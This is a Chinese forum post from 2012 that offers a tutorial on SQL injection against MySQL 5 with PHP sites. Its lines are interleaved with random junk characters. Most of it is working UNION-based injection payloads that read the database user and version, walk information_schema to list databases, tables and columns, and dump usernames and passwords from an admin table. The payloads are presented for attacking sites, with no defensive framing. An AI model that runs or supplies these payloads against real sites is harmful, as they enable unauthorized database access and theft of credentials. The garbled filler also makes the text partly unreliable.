- [" e( G, s J; V教程内容:Mysql 5+php 注入
& V! m9 p# A* @8 `& U9 O( V* @/ p. N l
8 K" i, W. O2 a6 \& \, D( a
6 w$ Z( t3 l8 m7 Y% \9 e
一.查看MYSQL基本信息(库名,版本,用户) d, z/ T$ v/ i+ u; n* e
1 M: Q& n- P! O7 Z" {3 land 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*& W( q, X$ V4 y( }; f
) E; `( o- \3 m$ L6 V# O+ e/ |二.查数据库
7 z1 i* m6 B; G/ ^6 @
( N+ T7 e" a" {$ n( F$ c( g/ s4 i% B; mand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*$ C, ^2 F$ v8 }) i# N
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
, U% v: p- F y4 F2 \0 |. a2 ]: l8 i' N7 m
三.暴表
8 M" s7 f% u( n# E4 V0 X% c1 {( y; F
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*, A$ a$ Y& @1 z8 H3 U
5 ^1 r2 T+ D. C0 {% T
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。6 e; r u. A) ^' K
, a) O+ H/ M( A& a$ f% O
四.暴字段
( P9 v& W# o) p9 \# g
- j o1 r1 t! ]. n7 Jand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*7 q2 ]; b8 E. h" g5 Q
/ O& R- s+ ?- B9 @
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。6 M4 `0 A5 ?9 k( r& G- |8 n
& a( k1 {6 w% m9 \5 O, I, ]4 l五.暴数据7 l+ j# Q8 b8 q7 m, v9 Y8 z9 K+ F
1 \ E; T* ~3 l- G: m
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
1 [: |, [ n% f! _) Y7 K2 c8 W/ P, P3 {" C" E" M
' V: j, Q% d, J4 P P0 b e; ^4 ~
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
# p2 X9 z3 i; h: v9 R+ C/ i* L2 e5 @ |
发表于 2012-9-13 16:27:53
收藏
支持
反对